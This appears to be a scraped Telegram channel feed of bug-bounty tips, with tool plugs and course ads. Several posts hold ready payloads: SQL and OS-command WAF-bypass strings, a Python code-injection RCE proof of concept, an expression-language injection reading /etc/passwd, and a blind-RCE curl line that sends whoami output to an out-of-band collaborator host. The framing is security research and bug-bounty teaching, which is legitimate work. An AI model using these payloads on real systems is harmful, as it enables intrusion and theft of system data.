Brut Security
14.7K subscribers
910 photos
73 videos
287 files
967 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
โšก๏ธOutdated but Helpful Some MySQL tricks to break some #WAFs out there. โš”๏ธ by @BRuteLogic

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`


#infosec #cybersec #bugbountytips
โค17
Hey Hunter's,
Darkshadow here back again, and Just Look at the wild thing:

User 1 Password:
protecting_my_accounts_with_long_readable_passwords123

User 2 Password:
protecting_my_accounts_with_long_readable_passwords456


If the web application using bcrypt hash algorithm then both user can login each other using there different password!

Explanation:
In bcrypt hash, only use first 72 bytes to make hash. That means, after 72 bytes every bytes  (73th, 74th ...) are ignored!

So if the any users first 72 bytes are same  (protecting_my_accounts_with_long_readable_passwords), then no matter after what he put on the password they both can login each other account.

#bugbountytips
๐Ÿ—ฟ10โค5
Hey Hunter's,
Darkshadow here back again, with another unique RCE method!

๐Ÿ’€RCE via Python Code Injection:

โœ…POC:
{
"name": "darkshadow",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}


Do you guy's really enjoy to read my methodology's? And if you want more
Guy's then feel free to share your thoughts in the comments โค๏ธ

Don't forget to follow me guys x.com/darkshadow2bd
โค19๐Ÿ˜ฑ9๐Ÿ—ฟ1
๐ŸŒ Tool of the Day: IPING โ€” IP Lookup & Detection

๐Ÿ”Ž Need quick IP facts? IPING lets you lookup any IP or domain
๐Ÿš€ Instant, accurate, and totally free โ€” returns ISP, country, city, coordinates, ASN, risk score and more. Perfect for OSINT, incident triage, or simple curiosity.
๐Ÿงญ Try it nowhttps://www.iping.cc/

#osint #infosec #cybersecurity #recon #bugbounty #tools #ip
๐Ÿ”ฅ3โค2๐Ÿ‘1๐Ÿ‘1๐Ÿ—ฟ1
๐Ÿ”–The ultimate 403 Bypass wordlists and tester notes by JHaddix

๐Ÿ“ฑ Github: ๐Ÿ”— Link

---------------------------------------------------------
๐Ÿš€ ๐‹๐ž๐ฏ๐ž๐ฅ ๐”๐ฉ ๐˜๐จ๐ฎ๐ซ ๐‚๐ฒ๐›๐ž๐ซ๐’๐ž๐œ ๐†๐š๐ฆ๐ž! ๐Ÿ”ฅ
๐ŸŒ brutsec.com
๐Ÿ“ฑ ๐“๐ž๐ฅ๐ž๐ ๐ซ๐š๐ฆ: t.iss.one/brutsecurity
๐Ÿ’ผ ๐—: x.com/brutsecurity
๐Ÿ“– ๐„๐ญ๐ก๐ข๐œ๐š๐ฅ ๐‡๐š๐œ๐ค๐ข๐ง๐  ๐‘๐จ๐š๐๐ฆ๐š๐ฉ: topmate.io/saumadip/1391531
๐ŸŽ“ ๐‚๐จ๐ฎ๐ซ๐ฌ๐ž ๐„๐ง๐ซ๐จ๐ฅ๐ฅ๐ฆ๐ž๐ง๐ญ: wa.link/brutsecurity
โญ ๐‹๐ข๐ค๐ž ๐ญ๐ก๐ข๐ฌ ๐ฉ๐จ๐ฌ๐ญ? โ†’ ๐…๐จ๐ฅ๐ฅ๐จ๐ฐ, ๐‰๐จ๐ข๐ง, ๐’๐ฎ๐›๐ฌ๐œ๐ซ๐ข๐›๐ž & ๐’๐ž๐ง๐ ๐’๐ญ๐š๐ซ๐ฌ ๐ญ๐จ ๐ฌ๐ก๐จ๐ฐ ๐ฒ๐จ๐ฎ๐ซ ๐ฌ๐ฎ๐ฉ๐ฉ๐จ๐ซ๐ญ!

#bugbounty #bugbountytips #cybersecurity #infosec #brutsecurity
โค9
โšกSubDomain Grabber - A bug bounty tool to download, unzip, and clean subdomains from Chaos ProjectDiscovery.

๐ŸšจConverts *.
abc.com to https://abc.com, organizes into directories, and removes ZIPs. Offers a colorful CLI, filters (BugCrowd, HackerOne, etc.), sorting, and pagination.

โœ…
https://github.com/MuhammadWaseem29/SubDomain-Grabber
โค6๐Ÿณ1
๐Ÿ›ฐ๏ธ Discover IPING โ€” Your Go-To IP Intelligence Tool

๐Ÿ’ก IPING helps you uncover whatโ€™s behind any IP address in seconds.

๐ŸŒ From location and ASN to proxy status and risk level โ€” all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.

๐Ÿš€ Explore now: https://www.iping.cc/
โค5๐Ÿ”ฅ3
๐ŸŒCloudRip - A tool that helps you find the real IP addresses hiding behind Cloudflare by checking subdomains. For penetration testing, security research, and learning how Cloudflare protection works.

๐Ÿ‘‰https://github.com/staxsum/CloudRip
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ16โค6๐Ÿ‘1
Hey Hunter,
what do you think Web Cache to RCE possible or not?
Yes! Itโ€™s really very intresting, Post coming Soon.
๐Ÿ˜ฑ20๐Ÿซก6โค5
Hey Hunter's,
Darkshadow here back again, dropping a really very interesting Method.

๐Ÿ’€Web cache to RCE!๐Ÿ˜

While i normally visit the web application i noticed, the website actively makes cache file from clint side to store errors.

Now The idea is, if we able to make any custom error then it will be cached, and if any how the error execute on the system we might see the output.

โœ…Exploit to reproduce final RCE:

1. The webapp was sending request from client side in a array based parameter.

2. Change the valid Input to a PHP code using system function. Here we just try to making a error using the invalid input.

3. Now the web application is not able to handle this input and makes error and store in a cache file.

4. After visiting the cache file, The error message reflecting on the cache file.

5. But wait, it's also execute my PHP code and store the command output in the file. Means we can execute OS commands output in cache file via making error. Means RCE!

Follow me for more methods x.com/darkshadow2bd
๐Ÿ”ฅ20๐Ÿ—ฟ8๐Ÿ˜ฑ4๐Ÿ‘2โค1๐Ÿ˜ข1
Hey Hunter's,
DarkShadow here back again, dropping a another interesting method!

๐Ÿ’€Auth bypass using Host Headerโ˜ 

Guy's This is most easiest and simple way to find most critical bug.


โœ…Step to Reproduce:
1. Open target in BurpSuite, and simply visit as possible deeper.
2. Filter all JS script files.
3. Figure out any sensitive path as well any Admin dashboard path.
4. Send request on the path via changing Host Header to localhost.

It's looks very simple guy's but still very impactful. Always add this technique in your checklist.

And also add me in your follow list๐Ÿ™ƒ
x.com/darkshadow2bd

#bugbountytips #authbypass
1๐Ÿ”ฅ18โค9๐Ÿ‘2๐Ÿคจ2๐Ÿ‘1๐Ÿค1
Hey Hunterโ€™s,
DarkShadow here back again, dropping another easiest way to get critical bugs!

If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.

โœ…POC Payload:
1. Change the Method GET to POST
2. Language={${system("cat+/etc/passwd")}}


If you guyโ€™s are really enjoy to read then show your love.

#bugbountytips #rce
1๐Ÿ”ฅ27โค9๐Ÿ‘5
Guys wanna see a very interesting blind RCE?
1๐Ÿ”ฅ25๐Ÿ‘10
Hey Hunterโ€™s,
DarkShadow here back again!

โ˜ ๏ธBlind Remote Code Execution๐Ÿ”ฅ

โœ…POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" https://BURP_LINK"

Others format you might try:
curl whoami.BURP_LINK
curl $(whoami).BURP_LINK

some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.

NOTICE: always check User-Agent Header in your burp collaborator responds, if here you got curl means RCE.

Now you hit follow me for more: x.com/darkshadow2bd
1๐Ÿ”ฅ24โค6๐Ÿ—ฟ6๐Ÿ‘3
Easy win for my students. You can enroll for Live courses too - wa.link/brutsecurity
1โค19
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.

Trying OS command injection, but WAF blocks every times?

โŒ cat /etc/hosts

โœ… tac /e\t\c/h\o\s\t\s
โœ… tac${IFS}/e\t\c/h\o\s\t\s
โœ… tac /e*c/h*st*
โœ… tac /e{t,c}*/{o,h}*s*{s,t}
โœ… tac /??c/??sts

Let me know guy's you all wants more or not like that?
1โค14๐Ÿ˜ฑ11๐Ÿ”ฅ6๐Ÿ‘2
Brut Security
Hey Hunter's, DarkShadow here back again, dropping some bypass methods that definitely help you. Trying OS command injection, but WAF blocks every times? โŒ cat /etc/hosts โœ… tac /e\t\c/h\o\s\t\s โœ… tac${IFS}/e\t\c/h\o\s\t\s โœ… tac /e*c/h*st* โœ… tac /e{t,c}*/{oโ€ฆ
This is for copy cats who copy my posts and share without cradit:

Hey copy cats, stop copying my posts and do your self. If you don't think deeply then first learn deeply.

~DarkShadow
1๐Ÿค9โค5๐Ÿซก4๐Ÿ”ฅ2๐Ÿ—ฟ2